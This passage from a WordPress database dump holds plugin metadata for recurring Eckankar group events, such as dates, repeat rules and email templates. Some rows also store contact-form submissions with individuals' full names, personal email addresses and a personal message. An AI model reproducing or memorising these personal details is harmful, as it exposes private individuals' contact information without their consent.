'),(149923,265909,'mec_allday','0'),(149924,265909,'one_occurrence','0'),(149925,265909,'mec_hide_time','0'),(149926,265909,'mec_hide_end_time','0'),(149927,265909,'mec_comment',''),(149928,265909,'mec_timezone','global'),(149929,265909,'mec_countdown_method','global'),(149930,265909,'mec_public','1'),(149931,265909,'mec_start_date','2021-11-20'),(149932,265909,'mec_start_time_hour','4'),(149933,265909,'mec_start_time_minutes','0'),(149934,265909,'mec_start_time_ampm','PM'),(149935,265909,'mec_start_day_seconds','57600'),(149936,265909,'mec_end_date','2021-11-20'),(149937,265909,'mec_end_time_hour','5'),(149938,265909,'mec_end_time_minutes','30'),(149939,265909,'mec_end_time_ampm','PM'),(149940,265909,'mec_end_day_seconds','63000'),(149941,265909,'mec_repeat_status','1'),(149942,265909,'mec_repeat_type','advanced'),(149943,265909,'mec_repeat_interval','1'),(149944,265909,'mec_repeat_end','occurrences'),(149945,265909,'mec_repeat_end_at_occurrences','11'),(149946,265909,'mec_repeat_end_at_date','2021-10-17'),(149947,265909,'mec_advanced_days','a:1:{i:0;s:5:\"Sat.3\";}'),(149948,265909,'mec_in_days',''),(149949,265909,'mec_not_in_days',''),(149950,265909,'mec_hourly_schedules','a:0:{}'),(149951,265909,'mec_booking','a:0:{}'),(149952,265909,'mec_tickets','a:0:{}'),(149953,265909,'mec_fees_global_inheritance','1'),(149954,265909,'mec_fees','a:0:{}'),(149955,265909,'mec_ticket_variations_global_inheritance','1'),(149956,265909,'mec_ticket_variations','a:0:{}'),(149957,265909,'mec_reg_fields_global_inheritance','1'),(149958,265909,'mec_reg_fields','a:0:{}'),(149959,265909,'mec_bfixed_fields','a:0:{}'),(149960,265909,'mec_op','a:0:{}'),(149961,265909,'mec_fields','a:0:{}'),(149962,265909,'mec_event_status','EventScheduled'),(149963,265909,'mec_moved_online_link',''),(149964,265909,'mec_cancelled_reason',''),(149965,265909,'mec_display_cancellation_reason_in_single_page',''),(149966,265909,'boldgrid_hide_page_title','0'),(149967,265909,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(149968,265909,'passster_activate_global_protection',NULL),(149969,265909,'passster_activate_protection',NULL),(149970,265909,'passster_protection_type','password'),(149971,265910,'protect_children',''),(149972,265910,'_edit_lock','1636489772:2'),(149973,265910,'_edit_last','2'),(151757,266078,'mec_repeat_end',''),(149975,265910,'mec_color',''),(149976,265910,'mec_location_id','118'),(149977,265910,'mec_dont_show_map','0'),(149978,265910,'mec_organizer_id','1'),(149979,265910,'mec_read_more',''),(149980,265910,'mec_more_info',''),(149981,265910,'mec_more_info_title',''),(149982,265910,'mec_more_info_target','_self'),(149983,265910,'mec_cost',''),(149984,265910,'mec_currency','a:0:{}'),(149985,265910,'mec_additional_organizer_ids','a:0:{}'),(149986,265910,'mec_additional_location_ids','a:0:{}'),(149987,265910,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-28\";s:4:\"hour\";s:1:\"9\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-28\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"15\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.4\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(149988,265910,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.4\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(149989,265910,'mec_certain_weekdays','a:0:{}'),(149990,265910,'mec_allday','0'),(149991,265910,'one_occurrence','0'),(149992,265910,'mec_hide_time','0'),(149993,265910,'mec_hide_end_time','0'),(149994,265910,'mec_comment',''),(149995,265910,'mec_timezone','global'),(149996,265910,'mec_countdown_method','global'),(149997,265910,'mec_public','1'),(149998,265910,'mec_start_date','2021-11-28'),(149999,265910,'mec_start_time_hour','9'),(150000,265910,'mec_start_time_minutes','0'),(150001,265910,'mec_start_time_ampm','AM'),(150002,265910,'mec_start_day_seconds','32400'),(150003,265910,'mec_end_date','2021-11-28'),(150004,265910,'mec_end_time_hour','10'),(150005,265910,'mec_end_time_minutes','15'),(150006,265910,'mec_end_time_ampm','PM'),(150007,265910,'mec_end_day_seconds','80100'),(150008,265910,'mec_repeat_status','1'),(150009,265910,'mec_repeat_type','advanced'),(150010,265910,'mec_repeat_interval','1'),(150011,265910,'mec_repeat_end','occurrences'),(150012,265910,'mec_repeat_end_at_occurrences','11'),(150013,265910,'mec_repeat_end_at_date','2021-10-17'),(150014,265910,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.4\";}'),(150015,265910,'mec_in_days',''),(150016,265910,'mec_not_in_days',''),(150017,265910,'mec_hourly_schedules','a:0:{}'),(150018,265910,'mec_booking','a:0:{}'),(150019,265910,'mec_tickets','a:0:{}'),(150020,265910,'mec_fees_global_inheritance','1'),(150021,265910,'mec_fees','a:0:{}'),(150022,265910,'mec_ticket_variations_global_inheritance','1'),(150023,265910,'mec_ticket_variations','a:0:{}'),(150024,265910,'mec_reg_fields_global_inheritance','1'),(150025,265910,'mec_reg_fields','a:0:{}'),(150026,265910,'mec_bfixed_fields','a:0:{}'),(150027,265910,'mec_op','a:0:{}'),(150028,265910,'mec_fields','a:0:{}'),(150029,265910,'mec_event_status','EventScheduled'),(150030,265910,'mec_moved_online_link',''),(150031,265910,'mec_cancelled_reason',''),(150032,265910,'mec_display_cancellation_reason_in_single_page',''),(150033,265910,'boldgrid_hide_page_title','0'),(150034,265910,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(150035,265910,'passster_activate_global_protection',NULL),(150036,265910,'passster_activate_protection',NULL),(150037,265910,'passster_protection_type','password'),(152049,266103,'mec_start_time_minutes','0'),(150041,265911,'protect_children',''),(150042,265911,'_edit_lock','1636493402:2'),(150043,265911,'_edit_last','2'),(151756,266078,'mec_repeat_interval','1'),(150045,265911,'mec_color',''),(150046,265911,'mec_location_id','118'),(150047,265911,'mec_dont_show_map','0'),(150048,265911,'mec_organizer_id','1'),(150049,265911,'mec_read_more',''),(150050,265911,'mec_more_info',''),(150051,265911,'mec_more_info_title',''),(150052,265911,'mec_more_info_target','_self'),(150053,265911,'mec_cost',''),(150054,265911,'mec_currency','a:0:{}'),(150055,265911,'mec_additional_organizer_ids','a:0:{}'),(150056,265911,'mec_additional_location_ids','a:0:{}'),(150057,265911,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-21\";s:4:\"hour\";s:1:\"9\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-21\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"15\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.3\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(150058,265911,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.3\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(150059,265911,'mec_certain_weekdays','a:0:{}'),(150060,265911,'mec_allday','0'),(150061,265911,'one_occurrence','0'),(150062,265911,'mec_hide_time','0'),(150063,265911,'mec_hide_end_time','0'),(150064,265911,'mec_comment',''),(150065,265911,'mec_timezone','global'),(150066,265911,'mec_countdown_method','global'),(150067,265911,'mec_public','1'),(150068,265911,'mec_start_date','2021-11-21'),(150069,265911,'mec_start_time_hour','9'),(150070,265911,'mec_start_time_minutes','0'),(150071,265911,'mec_start_time_ampm','AM'),(150072,265911,'mec_start_day_seconds','32400'),(150073,265911,'mec_end_date','2021-11-21'),(150074,265911,'mec_end_time_hour','10'),(150075,265911,'mec_end_time_minutes','15'),(150076,265911,'mec_end_time_ampm','AM'),(150077,265911,'mec_end_day_seconds','36900'),(150078,265911,'mec_repeat_status','1'),(150079,265911,'mec_repeat_type','advanced'),(150080,265911,'mec_repeat_interval','1'),(150081,265911,'mec_repeat_end','occurrences'),(150082,265911,'mec_repeat_end_at_occurrences','11'),(150083,265911,'mec_repeat_end_at_date','2021-10-17'),(150084,265911,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.3\";}'),(150085,265911,'mec_in_days',''),(150086,265911,'mec_not_in_days',''),(150087,265911,'mec_hourly_schedules','a:0:{}'),(150088,265911,'mec_booking','a:0:{}'),(150089,265911,'mec_tickets','a:0:{}'),(150090,265911,'mec_fees_global_inheritance','1'),(150091,265911,'mec_fees','a:0:{}'),(150092,265911,'mec_ticket_variations_global_inheritance','1'),(150093,265911,'mec_ticket_variations','a:0:{}'),(150094,265911,'mec_reg_fields_global_inheritance','1'),(150095,265911,'mec_reg_fields','a:0:{}'),(150096,265911,'mec_bfixed_fields','a:0:{}'),(150097,265911,'mec_op','a:0:{}'),(150098,265911,'mec_fields','a:0:{}'),(150099,265911,'mec_event_status','EventScheduled'),(150100,265911,'mec_moved_online_link',''),(150101,265911,'mec_cancelled_reason',''),(150102,265911,'mec_display_cancellation_reason_in_single_page',''),(150103,265911,'boldgrid_hide_page_title','0'),(150104,265911,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(150105,265911,'passster_activate_global_protection',NULL),(150106,265911,'passster_activate_protection',NULL),(150107,265911,'passster_protection_type','password'),(151755,266078,'mec_repeat_type',''),(151925,266084,'mec_event_status','EventScheduled'),(151926,266084,'mec_moved_online_link',''),(151927,266084,'mec_cancelled_reason',''),(151928,266084,'mec_display_cancellation_reason_in_single_page',''),(151929,266084,'boldgrid_hide_page_title','0'),(151930,266084,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(151921,266084,'mec_reg_fields','a:0:{}'),(151922,266084,'mec_bfixed_fields','a:0:{}'),(151923,266084,'mec_op','a:0:{}'),(151924,266084,'mec_fields','a:0:{}'),(151920,266084,'mec_reg_fields_global_inheritance','1'),(151919,266084,'mec_ticket_variations','a:0:{}'),(151918,266084,'mec_ticket_variations_global_inheritance','1'),(151917,266084,'mec_fees','a:0:{}'),(151916,266084,'mec_fees_global_inheritance','1'),(151915,266084,'mec_tickets','a:0:{}'),(151914,266084,'mec_booking','a:0:{}'),(151913,266084,'mec_hourly_schedules','a:0:{}'),(151912,266084,'mec_not_in_days',''),(151911,266084,'mec_in_days',''),(151910,266084,'mec_advanced_days','a:0:{}'),(151909,266084,'mec_repeat_end_at_date',''),(151908,266084,'mec_repeat_end_at_occurrences',''),(151907,266084,'mec_repeat_end',''),(151906,266084,'mec_repeat_interval','1'),(151905,266084,'mec_repeat_type',''),(151904,266084,'mec_repeat_status','0'),(151903,266084,'mec_end_day_seconds','72000'),(151902,266084,'mec_end_time_ampm','PM'),(151901,266084,'mec_end_time_minutes','0'),(151900,266084,'mec_end_time_hour','8'),(151899,266084,'mec_end_date','2021-12-27'),(151898,266084,'mec_start_day_seconds','68400'),(151897,266084,'mec_start_time_ampm','PM'),(151896,266084,'mec_start_time_minutes','0'),(151895,266084,'mec_start_time_hour','7'),(151894,266084,'mec_start_date','2021-12-27'),(151893,266084,'mec_public','1'),(151892,266084,'mec_countdown_method','global'),(151891,266084,'mec_timezone','global'),(151890,266084,'mec_comment',''),(151889,266084,'mec_hide_end_time','0'),(151888,266084,'mec_hide_time','0'),(151877,266084,'mec_more_info_title',''),(151878,266084,'mec_more_info_target','_self'),(151879,266084,'mec_cost',''),(151880,266084,'mec_currency','a:0:{}'),(151881,266084,'mec_additional_organizer_ids','a:0:{}'),(151882,266084,'mec_additional_location_ids','a:0:{}'),(151883,266084,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-12-27\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-12-27\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(151884,266084,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(151885,266084,'mec_certain_weekdays','a:0:{}'),(151886,266084,'mec_allday','0'),(151887,266084,'one_occurrence','0'),(151876,266084,'mec_more_info',''),(151875,266084,'mec_read_more',''),(151874,266084,'mec_organizer_id','1'),(151871,266084,'mec_color',''),(151872,266084,'mec_location_id','118'),(151873,266084,'mec_dont_show_map','0'),(151870,266084,'protect_children',''),(150177,265913,'protect_children',''),(150178,265913,'_edit_lock','1636494088:2'),(150179,265913,'_edit_last','2'),(151754,266078,'mec_repeat_status','0'),(150181,265913,'mec_color',''),(150182,265913,'mec_location_id','129'),(150183,265913,'mec_dont_show_map','0'),(150184,265913,'mec_organizer_id','1'),(150185,265913,'mec_read_more',''),(150186,265913,'mec_more_info',''),(150187,265913,'mec_more_info_title',''),(150188,265913,'mec_more_info_target','_self'),(150189,265913,'mec_cost',''),(150190,265913,'mec_currency','a:0:{}'),(150191,265913,'mec_additional_organizer_ids','a:0:{}'),(150192,265913,'mec_additional_location_ids','a:0:{}'),(150193,265913,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-07\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"45\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-07\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"45\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.1\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(150194,265913,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.1\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(150195,265913,'mec_certain_weekdays','a:0:{}'),(150196,265913,'mec_allday','0'),(150197,265913,'one_occurrence','0'),(150198,265913,'mec_hide_time','0'),(150199,265913,'mec_hide_end_time','0'),(150200,265913,'mec_comment',''),(150201,265913,'mec_timezone','global'),(150202,265913,'mec_countdown_method','global'),(150203,265913,'mec_public','1'),(150204,265913,'mec_start_date','2021-11-07'),(150205,265913,'mec_start_time_hour','11'),(150206,265913,'mec_start_time_minutes','45'),(150207,265913,'mec_start_time_ampm','PM'),(150208,265913,'mec_start_day_seconds','85500'),(150209,265913,'mec_end_date','2021-11-07'),(150210,265913,'mec_end_time_hour','11'),(150211,265913,'mec_end_time_minutes','45'),(150212,265913,'mec_end_time_ampm','PM'),(150213,265913,'mec_end_day_seconds','85500'),(150214,265913,'mec_repeat_status','1'),(150215,265913,'mec_repeat_type','advanced'),(150216,265913,'mec_repeat_interval','1'),(150217,265913,'mec_repeat_end','occurrences'),(150218,265913,'mec_repeat_end_at_occurrences','11'),(150219,265913,'mec_repeat_end_at_date','2021-10-17'),(150220,265913,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.1\";}'),(150221,265913,'mec_in_days',''),(150222,265913,'mec_not_in_days',''),(150223,265913,'mec_hourly_schedules','a:0:{}'),(150224,265913,'mec_booking','a:0:{}'),(150225,265913,'mec_tickets','a:0:{}'),(150226,265913,'mec_fees_global_inheritance','1'),(150227,265913,'mec_fees','a:0:{}'),(150228,265913,'mec_ticket_variations_global_inheritance','1'),(150229,265913,'mec_ticket_variations','a:0:{}'),(150230,265913,'mec_reg_fields_global_inheritance','1'),(150231,265913,'mec_reg_fields','a:0:{}'),(150232,265913,'mec_bfixed_fields','a:0:{}'),(150233,265913,'mec_op','a:0:{}'),(150234,265913,'mec_fields','a:0:{}'),(150235,265913,'mec_event_status','EventScheduled'),(150236,265913,'mec_moved_online_link',''),(150237,265913,'mec_cancelled_reason',''),(150238,265913,'mec_display_cancellation_reason_in_single_page',''),(150239,265913,'boldgrid_hide_page_title','0'),(150240,265913,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(150241,265913,'passster_activate_global_protection',NULL),(150242,265913,'passster_activate_protection',NULL),(150243,265913,'passster_protection_type','password'),(152015,266100,'_field_224','Richard'),(152016,266100,'_field_225','Thériault'),(152017,266100,'_field_226','richardthe@bell.net'),(152018,266100,'_field_227','VT'),(152019,266100,'_field_228','CA'),(152020,266100,'_field_229','a:3:{i:0;s:16:\"Colorado Springs\";i:1;s:39:\"Central Colorado/ECK Temple in Colorado\";i:2;s:8:\"Loveland\";}'),(152021,266100,'_form_id','21'),(152022,266100,'_seq_num','140'),(152028,266103,'mec_read_more',''),(152029,266103,'mec_more_info',''),(152030,266103,'mec_more_info_title',''),(152031,266103,'mec_more_info_target','_self'),(152032,266103,'mec_cost',''),(152033,266103,'mec_currency','a:0:{}'),(152034,266103,'mec_additional_organizer_ids','a:0:{}'),(152035,266103,'mec_additional_location_ids','a:0:{}'),(152036,266103,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-02-19\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-02-19\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(152005,266098,'_field_402','Richard '),(152006,266098,'_field_403','Thériault'),(151990,266093,'_seq_num','19'),(151989,266093,'_form_id','44'),(151988,266093,'_field_404','hospiceallembe@gmail.com'),(151987,266093,'_field_403','Allembe'),(151986,266093,'_field_402','Rebazar'),(151969,261549,'mec_additional_organizer_ids','a:0:{}'),(151968,261549,'mec_organizer_id','0'),(151967,261549,'mec_additional_location_ids','a:0:{}'),(151966,261549,'mec_location_id','0'),(151965,266089,'_seq_num','92'),(151964,266089,'_form_id','13'),(151945,266086,'_field_426','Allembe'),(151946,266086,'_field_427','hospiceallembe@gmail.com'),(151947,266086,'_form_id','46'),(151948,266086,'_seq_num','31'),(151949,266087,'_field_425','Laurah'),(151950,266087,'_field_426','Brock Young'),(151951,266087,'_field_427','laurahbrockyoung@gmail.com'),(151952,266087,'_form_id','46'),(151953,266087,'_seq_num','32'),(151954,266088,'_field_425','Laura '),(151955,266088,'_field_426','Sheehan Barron'),(151956,266088,'_field_427','laurasheehanbarron@gmail.com'),(151957,266088,'_form_id','46'),(151958,266088,'_seq_num','33'),(151959,266089,'_field_133','Jade'),(151960,266089,'_field_134','Beaty'),(151961,266089,'_field_135','jadebeaty2020@gmail.com'),(151962,266089,'_field_137','New to Fort Collins'),(151963,266089,'_field_138','Hello, \n\nI\'d like to connect with members of the local Eckankar group. Are there any social gatherings going on?\n\nThanks, \nJade'),(151944,266086,'_field_425','Rebazar'),(151943,266085,'_seq_num','30'),(151942,266085,'_form_id','46'),(151940,266085,'_field_426','Greenstreet'),(151941,266085,'_field_427','bngstreet@gmail.com'),(151939,266085,'_field_425','Bonnie'),(150314,265915,'protect_children',''),(150315,265915,'protect_children',''),(151753,266078,'mec_end_day_seconds','57600'),(150317,265915,'mec_color',''),(150318,265915,'mec_location_id','118'),(150319,265915,'mec_dont_show_map','0'),(150320,265915,'mec_organizer_id','1'),(150321,265915,'mec_read_more',''),(150322,265915,'mec_more_info',''),(150323,265915,'mec_more_info_title',''),(150324,265915,'mec_more_info_target','_self'),(150325,265915,'mec_cost',''),(150326,265915,'mec_currency','a:0:{}'),(150327,265915,'mec_additional_organizer_ids','a:0:{}'),(150328,265915,'mec_additional_location_ids','a:0:{}'),(150329,265915,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-10\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-10\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Wed.2\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(150330,265915,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Wed.2\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(150331,265915,'mec_certain_weekdays','a:0:{}'),(150332,265915,'mec_allday','0'),(